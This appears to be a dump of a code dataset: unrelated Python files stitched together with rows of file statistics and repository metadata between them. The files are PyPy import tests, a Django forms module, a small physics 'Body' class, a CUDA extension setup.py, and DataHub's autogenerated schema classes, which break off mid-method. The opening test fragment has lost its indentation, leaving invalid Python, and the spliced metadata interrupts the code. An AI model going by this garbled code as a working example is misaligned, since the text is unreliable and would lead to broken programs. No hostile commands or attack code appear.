w_pre_dict = PyImport_GetModuleDict(space, )
assert not space.contains_w(w_pre_dict, space.wrap(testmod))
with rffi.scoped_str2charp(testmod) as modname:
w_module = PyImport_ImportModule(space, modname)
            print(w_module)
assert w_module
w_dict = PyImport_GetModuleDict(space, )
assert space.contains_w(w_dict, space.wrap(testmod))
def test_reload(self, space):
stat = PyImport_Import(space, space.wrap("stat"))
space.delattr(stat, space.wrap("S_IMODE"))
stat = PyImport_ReloadModule(space, stat)
assert space.getattr(stat, space.wrap("S_IMODE"))
def test_ImportModuleLevelObject(self, space):
w_mod = PyImport_ImportModuleLevelObject(
space, space.wrap('stat'), None, None, None, 0)
assert w_mod
assert space.getattr(w_mod, space.wrap("S_IMODE"))
def test_lock(self, space):
# "does not crash"
_PyImport_AcquireLock(space, )
_PyImport_AcquireLock(space, )
_PyImport_ReleaseLock(space, )
_PyImport_ReleaseLock(space, )
class AppTestImportLogic(AppTestCpythonExtensionBase):
def test_import_logic(self):
import sys, os
path = self.compile_module('test_import_module',
source_files=[os.path.join(self.here, 'test_import_module.c')])
sys.path.append(os.path.dirname(path))
import test_import_module
assert test_import_module.TEST is None
| 38.507692 | 77 | 0.675589 | 300 | 2,503 | 5.393333 | 0.233333 | 0.055624 | 0.034611 | 0.049444 | 0.302225 | 0.202719 | 0.114957 | 0.114957 | 0.114957 | 0.059333 | 0 | 0.002073 | 0.228925 | 2,503 | 64 | 78 | 39.109375 | 0.836269 | 0.006392 | 0 | 0.153846 | 0 | 0 | 0.043058 | 0 | 0 | 0 | 0 | 0 | 0.211538 | 0 | null | null | 0 | 0.557692 | null | null | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
133ea567de2500445cdac9287e2c77d664b04fae | 321 | py | Python | drinks/forms.py | Mohit7143/class | 7859447c77548f54b590db73b678828e3bc91305 | [
"BSD-3-Clause"
] | null | null | null | drinks/forms.py | Mohit7143/class | 7859447c77548f54b590db73b678828e3bc91305 | [
"BSD-3-Clause"
] | null | null | null | drinks/forms.py | Mohit7143/class | 7859447c77548f54b590db73b678828e3bc91305 | [
"BSD-3-Clause"
] | null | null | null | from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import Article, Comment


class initform(forms.ModelForm):
    class Meta:
        model = Article
        fields = ['title', 'content']


class commentadd(forms.ModelForm):
    class Meta:
        model = Comment
        fields = ['content']
1355b07837bf38e58a8e362e15790c8a2b739ed8 | 232 | py | Python | python/nbody/body.py | jacksonlanecole/rk_genetic | 9f87eedd418ba182d2e6cdde24e35b7f20f7ac65 | [
"MIT"
] | null | null | null | python/nbody/body.py | jacksonlanecole/rk_genetic | 9f87eedd418ba182d2e6cdde24e35b7f20f7ac65 | [
"MIT"
] | null | null | null | python/nbody/body.py | jacksonlanecole/rk_genetic | 9f87eedd418ba182d2e6cdde24e35b7f20f7ac65 | [
"MIT"
] | null | null | null | class Body(object):
    def __init__(self, mass, position, velocity, name=None):
        if name is not None:
self.name = name
self.mass = mass
self.position = position
self.velocity = velocity
| 23.2 | 62 | 0.568966 | 26 | 232 | 4.923077 | 0.461538 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.327586 | 232 | 9 | 63 | 25.777778 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
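A usage sketch for the class above; the `Body` definition is repeated here so the snippet runs on its own. Note that `name` is only set when one is supplied, so reading it on an unnamed body raises `AttributeError`.

```python
# Body stores mass/position/velocity unconditionally, name only if given.
class Body(object):
    def __init__(self, mass, position, velocity, name=None):
        if name is not None:
            self.name = name
        self.mass = mass
        self.position = position
        self.velocity = velocity

earth = Body(5.97e24, [1.5e11, 0.0], [0.0, 2.98e4], name="earth")
anon = Body(1.0, [0.0, 0.0], [0.0, 0.0])
print(earth.name)             # earth
print(hasattr(anon, "name"))  # False
```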
13607b6083bd59eba24c5f4ac48a34048b55f642 | 1,327 | py | Python | imaginaire/third_party/bias_act/setup.py | hw07216/imaginaire | 87c774114622e39488a5ea8a7728b1a20896afb9 | [
"RSA-MD"
] | 3,308 | 2020-07-15T17:50:13.000Z | 2022-03-31T14:53:31.000Z | imaginaire/third_party/bias_act/setup.py | hw07216/imaginaire | 87c774114622e39488a5ea8a7728b1a20896afb9 | [
"RSA-MD"
] | 132 | 2020-09-20T17:36:28.000Z | 2022-03-28T12:40:03.000Z | src/imaginaire/third_party/bias_act/setup.py | livingbio/imaginaire-fsvid2vid | d82c87aced50afd44fd162491ba5b59056b74034 | [
"RSA-MD"
] | 370 | 2020-09-29T00:34:08.000Z | 2022-03-30T04:12:48.000Z | # flake8: noqa
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CUDAExtension
import os
cuda_version = os.getenv('CUDA_VERSION')
print('CUDA_VERSION: {}'.format(cuda_version))
nvcc_args = list()
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_50,code=sm_50')
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_52,code=sm_52')
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_60,code=sm_60')
# nvcc_args.append('-gencode')
# nvcc_args.append('arch=compute_61,code=sm_61')
nvcc_args.append('-gencode')
nvcc_args.append('arch=compute_70,code=sm_70')
nvcc_args.append('-gencode')
nvcc_args.append('arch=compute_75,code=sm_75')
if cuda_version is not None:
    # Compare the major version numerically; a plain string comparison
    # would wrongly treat e.g. '9.2' as >= '11.0'.
    if int(cuda_version.split('.')[0]) >= 11:
nvcc_args.append('-gencode')
nvcc_args.append('arch=compute_80,code=sm_80')
nvcc_args.append('-Xcompiler')
nvcc_args.append('-Wall')
nvcc_args.append('-std=c++14')
setup(
name='bias_act_cuda',
py_modules=['bias_act'],
ext_modules=[
CUDAExtension('bias_act_cuda', [
'./src/bias_act_cuda.cc',
'./src/bias_act_cuda_kernel.cu'
], extra_compile_args={'cxx': ['-Wall', '-std=c++14'],
'nvcc': nvcc_args})
],
cmdclass={
'build_ext': BuildExtension
})
| 30.159091 | 67 | 0.679729 | 188 | 1,327 | 4.505319 | 0.319149 | 0.179457 | 0.280992 | 0.173554 | 0.380165 | 0.380165 | 0.380165 | 0.380165 | 0.380165 | 0 | 0 | 0.032 | 0.152223 | 1,327 | 43 | 68 | 30.860465 | 0.720889 | 0.238131 | 0 | 0.1 | 0 | 0 | 0.274725 | 0.128871 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.033333 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
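A typical way to build the extension defined by the `setup()` call above (hypothetical invocation; assumes `nvcc` and a PyTorch install matching the CUDA toolkit are available):

```shell
# Build bias_act_cuda in place; CUDA_VERSION gates the sm_80 gencode flags.
CUDA_VERSION=11.1 python setup.py build_ext --inplace
```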
136be5dc3a62ef4e558aa31281aabfb145f6c5aa | 316,016 | py | Python | metadata-ingestion/src/datahub/metadata/schema_classes.py | eileenjc/datahub | 44ed2f36849a424153e21c4e3667184cfcb61fca | [
"Apache-2.0"
] | null | null | null | metadata-ingestion/src/datahub/metadata/schema_classes.py | eileenjc/datahub | 44ed2f36849a424153e21c4e3667184cfcb61fca | [
"Apache-2.0"
] | null | null | null | metadata-ingestion/src/datahub/metadata/schema_classes.py | eileenjc/datahub | 44ed2f36849a424153e21c4e3667184cfcb61fca | [
"Apache-2.0"
] | 1 | 2021-07-09T14:30:49.000Z | 2021-07-09T14:30:49.000Z | # flake8: noqa
# This file is autogenerated by /metadata-ingestion/scripts/avro_codegen.py
# Do not modify manually!
# fmt: off
import json
import os.path
import decimal
import datetime
import six
from avrogen.dict_wrapper import DictWrapper
from avrogen import avrojson
from avro.schema import RecordSchema, SchemaFromJSONData as make_avsc_object
from avro import schema as avro_schema
from typing import List, Dict, Union, Optional
def __read_file(file_name):
with open(file_name, "r") as f:
return f.read()
def __get_names_and_schema(json_str):
names = avro_schema.Names()
schema = make_avsc_object(json.loads(json_str), names)
return names, schema
SCHEMA_JSON_STR = __read_file(os.path.join(os.path.dirname(__file__), "schema.avsc"))
__NAMES, SCHEMA = __get_names_and_schema(SCHEMA_JSON_STR)
__SCHEMAS: Dict[str, RecordSchema] = {}
def get_schema_type(fullname):
return __SCHEMAS.get(fullname)
__SCHEMAS = dict((n.fullname.lstrip("."), n) for n in six.itervalues(__NAMES.names))
class KafkaAuditHeaderClass(DictWrapper):
"""This header records information about the context of an event as it is emitted into kafka and is intended to be used by the kafka audit application. For more information see go/kafkaauditheader"""
RECORD_SCHEMA = get_schema_type("com.linkedin.events.KafkaAuditHeader")
def __init__(self,
time: int,
server: str,
appName: str,
messageId: bytes,
instance: Union[None, str]=None,
auditVersion: Union[None, int]=None,
fabricUrn: Union[None, str]=None,
clusterConnectionString: Union[None, str]=None,
):
super().__init__()
self.time = time
self.server = server
self.instance = instance
self.appName = appName
self.messageId = messageId
self.auditVersion = auditVersion
self.fabricUrn = fabricUrn
self.clusterConnectionString = clusterConnectionString
@classmethod
def construct_with_defaults(cls) -> "KafkaAuditHeaderClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.time = int()
self.server = str()
self.instance = self.RECORD_SCHEMA.field_map["instance"].default
self.appName = str()
self.messageId = bytes()
self.auditVersion = self.RECORD_SCHEMA.field_map["auditVersion"].default
self.fabricUrn = self.RECORD_SCHEMA.field_map["fabricUrn"].default
self.clusterConnectionString = self.RECORD_SCHEMA.field_map["clusterConnectionString"].default
@property
def time(self) -> int:
"""Getter: The time at which the event was emitted into kafka."""
return self._inner_dict.get('time') # type: ignore
@time.setter
def time(self, value: int) -> None:
"""Setter: The time at which the event was emitted into kafka."""
self._inner_dict['time'] = value
@property
def server(self) -> str:
"""Getter: The fully qualified name of the host from which the event is being emitted."""
return self._inner_dict.get('server') # type: ignore
@server.setter
def server(self, value: str) -> None:
"""Setter: The fully qualified name of the host from which the event is being emitted."""
self._inner_dict['server'] = value
@property
def instance(self) -> Union[None, str]:
"""Getter: The instance on the server from which the event is being emitted. e.g. i001"""
return self._inner_dict.get('instance') # type: ignore
@instance.setter
def instance(self, value: Union[None, str]) -> None:
"""Setter: The instance on the server from which the event is being emitted. e.g. i001"""
self._inner_dict['instance'] = value
@property
def appName(self) -> str:
"""Getter: The name of the application from which the event is being emitted. see go/appname"""
return self._inner_dict.get('appName') # type: ignore
@appName.setter
def appName(self, value: str) -> None:
"""Setter: The name of the application from which the event is being emitted. see go/appname"""
self._inner_dict['appName'] = value
@property
def messageId(self) -> bytes:
"""Getter: A unique identifier for the message"""
return self._inner_dict.get('messageId') # type: ignore
@messageId.setter
def messageId(self, value: bytes) -> None:
"""Setter: A unique identifier for the message"""
self._inner_dict['messageId'] = value
@property
def auditVersion(self) -> Union[None, int]:
"""Getter: The version that is being used for auditing. In version 0, the audit trail buckets events into 10 minute audit windows based on the EventHeader timestamp. In version 1, the audit trail buckets events as follows: if the schema has an outer KafkaAuditHeader, use the outer audit header timestamp for bucketing; else if the EventHeader has an inner KafkaAuditHeader use that inner audit header's timestamp for bucketing"""
return self._inner_dict.get('auditVersion') # type: ignore
@auditVersion.setter
def auditVersion(self, value: Union[None, int]) -> None:
"""Setter: The version that is being used for auditing. In version 0, the audit trail buckets events into 10 minute audit windows based on the EventHeader timestamp. In version 1, the audit trail buckets events as follows: if the schema has an outer KafkaAuditHeader, use the outer audit header timestamp for bucketing; else if the EventHeader has an inner KafkaAuditHeader use that inner audit header's timestamp for bucketing"""
self._inner_dict['auditVersion'] = value
@property
def fabricUrn(self) -> Union[None, str]:
"""Getter: The fabricUrn of the host from which the event is being emitted. Fabric Urn in the format of urn:li:fabric:{fabric_name}. See go/fabric."""
return self._inner_dict.get('fabricUrn') # type: ignore
@fabricUrn.setter
def fabricUrn(self, value: Union[None, str]) -> None:
"""Setter: The fabricUrn of the host from which the event is being emitted. Fabric Urn in the format of urn:li:fabric:{fabric_name}. See go/fabric."""
self._inner_dict['fabricUrn'] = value
@property
def clusterConnectionString(self) -> Union[None, str]:
"""Getter: This is a String that the client uses to establish some kind of connection with the Kafka cluster. The exact format of it depends on specific versions of clients and brokers. This information could potentially identify the fabric and cluster with which the client is producing to or consuming from."""
return self._inner_dict.get('clusterConnectionString') # type: ignore
@clusterConnectionString.setter
def clusterConnectionString(self, value: Union[None, str]) -> None:
"""Setter: This is a String that the client uses to establish some kind of connection with the Kafka cluster. The exact format of it depends on specific versions of clients and brokers. This information could potentially identify the fabric and cluster with which the client is producing to or consuming from."""
self._inner_dict['clusterConnectionString'] = value
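A standalone sketch (illustrative class names, not the real datahub types) of the wrapper pattern these generated classes share: each field is a property that reads and writes a single inner dict, so the whole object can be serialized from that dict in one step.

```python
# Each generated class keeps its state in _inner_dict; the typed
# properties are just getters/setters over dict keys.
class DictWrapperSketch:
    def __init__(self):
        self._inner_dict = {}

class AuditHeaderSketch(DictWrapperSketch):
    @property
    def time(self):
        return self._inner_dict.get("time")

    @time.setter
    def time(self, value):
        self._inner_dict["time"] = value

h = AuditHeaderSketch()
h.time = 1234
print(h.time)         # 1234
print(h._inner_dict)  # {'time': 1234}
```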
class ChartInfoClass(DictWrapper):
"""Information about a chart"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.chart.ChartInfo")
def __init__(self,
title: str,
description: str,
lastModified: "ChangeAuditStampsClass",
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
chartUrl: Union[None, str]=None,
inputs: Union[None, List[str]]=None,
type: Union[None, Union[str, "ChartTypeClass"]]=None,
access: Union[None, Union[str, "AccessLevelClass"]]=None,
lastRefreshed: Union[None, int]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.title = title
self.description = description
self.lastModified = lastModified
self.chartUrl = chartUrl
self.inputs = inputs
self.type = type
self.access = access
self.lastRefreshed = lastRefreshed
@classmethod
def construct_with_defaults(cls) -> "ChartInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.title = str()
self.description = str()
self.lastModified = ChangeAuditStampsClass.construct_with_defaults()
self.chartUrl = self.RECORD_SCHEMA.field_map["chartUrl"].default
self.inputs = self.RECORD_SCHEMA.field_map["inputs"].default
self.type = self.RECORD_SCHEMA.field_map["type"].default
self.access = self.RECORD_SCHEMA.field_map["access"].default
self.lastRefreshed = self.RECORD_SCHEMA.field_map["lastRefreshed"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def title(self) -> str:
"""Getter: Title of the chart"""
return self._inner_dict.get('title') # type: ignore
@title.setter
def title(self, value: str) -> None:
"""Setter: Title of the chart"""
self._inner_dict['title'] = value
@property
def description(self) -> str:
"""Getter: Detailed description about the chart"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: str) -> None:
"""Setter: Detailed description about the chart"""
self._inner_dict['description'] = value
@property
def lastModified(self) -> "ChangeAuditStampsClass":
"""Getter: Captures information about who created/last modified/deleted this chart and when"""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "ChangeAuditStampsClass") -> None:
"""Setter: Captures information about who created/last modified/deleted this chart and when"""
self._inner_dict['lastModified'] = value
@property
def chartUrl(self) -> Union[None, str]:
"""Getter: URL for the chart. This could be used as an external link on DataHub to allow users access/view the chart"""
return self._inner_dict.get('chartUrl') # type: ignore
@chartUrl.setter
def chartUrl(self, value: Union[None, str]) -> None:
"""Setter: URL for the chart. This could be used as an external link on DataHub to allow users access/view the chart"""
self._inner_dict['chartUrl'] = value
@property
def inputs(self) -> Union[None, List[str]]:
"""Getter: Data sources for the chart"""
return self._inner_dict.get('inputs') # type: ignore
@inputs.setter
def inputs(self, value: Union[None, List[str]]) -> None:
"""Setter: Data sources for the chart"""
self._inner_dict['inputs'] = value
@property
def type(self) -> Union[None, Union[str, "ChartTypeClass"]]:
"""Getter: Type of the chart"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[None, Union[str, "ChartTypeClass"]]) -> None:
"""Setter: Type of the chart"""
self._inner_dict['type'] = value
@property
def access(self) -> Union[None, Union[str, "AccessLevelClass"]]:
"""Getter: Access level for the chart"""
return self._inner_dict.get('access') # type: ignore
@access.setter
def access(self, value: Union[None, Union[str, "AccessLevelClass"]]) -> None:
"""Setter: Access level for the chart"""
self._inner_dict['access'] = value
@property
def lastRefreshed(self) -> Union[None, int]:
"""Getter: The time when this chart last refreshed"""
return self._inner_dict.get('lastRefreshed') # type: ignore
@lastRefreshed.setter
def lastRefreshed(self, value: Union[None, int]) -> None:
"""Setter: The time when this chart last refreshed"""
self._inner_dict['lastRefreshed'] = value
class ChartQueryClass(DictWrapper):
"""Information for chart query which is used for getting data of the chart"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.chart.ChartQuery")
def __init__(self,
rawQuery: str,
type: Union[str, "ChartQueryTypeClass"],
):
super().__init__()
self.rawQuery = rawQuery
self.type = type
@classmethod
def construct_with_defaults(cls) -> "ChartQueryClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.rawQuery = str()
self.type = ChartQueryTypeClass.LOOKML
@property
def rawQuery(self) -> str:
"""Getter: Raw query to build a chart from input datasets"""
return self._inner_dict.get('rawQuery') # type: ignore
@rawQuery.setter
def rawQuery(self, value: str) -> None:
"""Setter: Raw query to build a chart from input datasets"""
self._inner_dict['rawQuery'] = value
@property
def type(self) -> Union[str, "ChartQueryTypeClass"]:
"""Getter: Chart query type"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "ChartQueryTypeClass"]) -> None:
"""Setter: Chart query type"""
self._inner_dict['type'] = value
class ChartQueryTypeClass(object):
# No docs available.
"""LookML queries"""
LOOKML = "LOOKML"
"""SQL type queries"""
SQL = "SQL"
class ChartTypeClass(object):
"""The various types of charts"""
"""Chart showing a Bar chart"""
BAR = "BAR"
"""Chart showing a Pie chart"""
PIE = "PIE"
"""Chart showing a Scatter plot"""
SCATTER = "SCATTER"
"""Chart showing a table"""
TABLE = "TABLE"
"""Chart showing Markdown formatted text"""
TEXT = "TEXT"
LINE = "LINE"
AREA = "AREA"
HISTOGRAM = "HISTOGRAM"
BOX_PLOT = "BOX_PLOT"
class EditableChartPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.chart.EditableChartProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableChartPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the chart """
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the chart """
self._inner_dict['description'] = value
class AccessLevelClass(object):
"""The various access levels"""
"""Publicly available access level"""
PUBLIC = "PUBLIC"
"""Private availability to certain set of users"""
PRIVATE = "PRIVATE"
class AuditStampClass(DictWrapper):
"""Data captured on a resource/association/sub-resource level giving insight into when that resource/association/sub-resource moved into a particular lifecycle stage, and who acted to move it into that specific lifecycle stage."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.AuditStamp")
def __init__(self,
time: int,
actor: str,
impersonator: Union[None, str]=None,
):
super().__init__()
self.time = time
self.actor = actor
self.impersonator = impersonator
@classmethod
def construct_with_defaults(cls) -> "AuditStampClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.time = int()
self.actor = str()
self.impersonator = self.RECORD_SCHEMA.field_map["impersonator"].default
@property
def time(self) -> int:
"""Getter: When did the resource/association/sub-resource move into the specific lifecycle stage represented by this AuditEvent."""
return self._inner_dict.get('time') # type: ignore
@time.setter
def time(self, value: int) -> None:
"""Setter: When did the resource/association/sub-resource move into the specific lifecycle stage represented by this AuditEvent."""
self._inner_dict['time'] = value
@property
def actor(self) -> str:
"""Getter: The entity (e.g. a member URN) which will be credited for moving the resource/association/sub-resource into the specific lifecycle stage. It is also the one used to authorize the change."""
return self._inner_dict.get('actor') # type: ignore
@actor.setter
def actor(self, value: str) -> None:
"""Setter: The entity (e.g. a member URN) which will be credited for moving the resource/association/sub-resource into the specific lifecycle stage. It is also the one used to authorize the change."""
self._inner_dict['actor'] = value
@property
def impersonator(self) -> Union[None, str]:
"""Getter: The entity (e.g. a service URN) which performs the change on behalf of the Actor and must be authorized to act as the Actor."""
return self._inner_dict.get('impersonator') # type: ignore
@impersonator.setter
def impersonator(self, value: Union[None, str]) -> None:
"""Setter: The entity (e.g. a service URN) which performs the change on behalf of the Actor and must be authorized to act as the Actor."""
self._inner_dict['impersonator'] = value
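Each generated record class above stores its fields in an underlying `_inner_dict` and exposes them through typed properties, so attribute access and the serialized dict stay in sync. A minimal standalone sketch of that pattern (the `AuditStampSketch` name is a hypothetical stand-in, not the generated class):

```python
# Sketch of the _inner_dict property pattern used by the generated classes:
# fields live in one dict, and typed properties read/write that dict.
from typing import Optional


class AuditStampSketch:
    def __init__(self, time: int, actor: str, impersonator: Optional[str] = None):
        self._inner_dict: dict = {}
        self.time = time            # each assignment goes through a setter below
        self.actor = actor
        self.impersonator = impersonator

    @property
    def time(self) -> int:
        return self._inner_dict.get("time")  # type: ignore

    @time.setter
    def time(self, value: int) -> None:
        self._inner_dict["time"] = value

    @property
    def actor(self) -> str:
        return self._inner_dict.get("actor")  # type: ignore

    @actor.setter
    def actor(self, value: str) -> None:
        self._inner_dict["actor"] = value

    @property
    def impersonator(self) -> Optional[str]:
        return self._inner_dict.get("impersonator")  # type: ignore

    @impersonator.setter
    def impersonator(self, value: Optional[str]) -> None:
        self._inner_dict["impersonator"] = value


stamp = AuditStampSketch(time=0, actor="urn:li:corpuser:unknown")
```

Because the properties delegate to `_inner_dict`, serializing an instance is just a matter of emitting that dict.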
class BrowsePathsClass(DictWrapper):
"""Shared aspect containing Browse Paths to be indexed for an entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.BrowsePaths")
def __init__(self,
paths: List[str],
):
super().__init__()
self.paths = paths
@classmethod
def construct_with_defaults(cls) -> "BrowsePathsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.paths = list()
@property
def paths(self) -> List[str]:
"""Getter: A list of valid browse paths for the entity.
Browse paths are expected to be forward-slash-separated strings. For example: 'prod/snowflake/datasetName'"""
return self._inner_dict.get('paths') # type: ignore
@paths.setter
def paths(self, value: List[str]) -> None:
"""Setter: A list of valid browse paths for the entity.
Browse paths are expected to be forward-slash-separated strings. For example: 'prod/snowflake/datasetName'"""
self._inner_dict['paths'] = value
class ChangeAuditStampsClass(DictWrapper):
"""Data captured on a resource/association/sub-resource level giving insight into when that resource/association/sub-resource moved into various lifecycle stages, and who acted to move it into those lifecycle stages. The recommended best practice is to include this record in your record schema, and annotate its fields as @readOnly in your resource. See https://github.com/linkedin/rest.li/wiki/Validation-in-Rest.li#restli-validation-annotations"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.ChangeAuditStamps")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
@classmethod
def construct_with_defaults(cls) -> "ChangeAuditStampsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
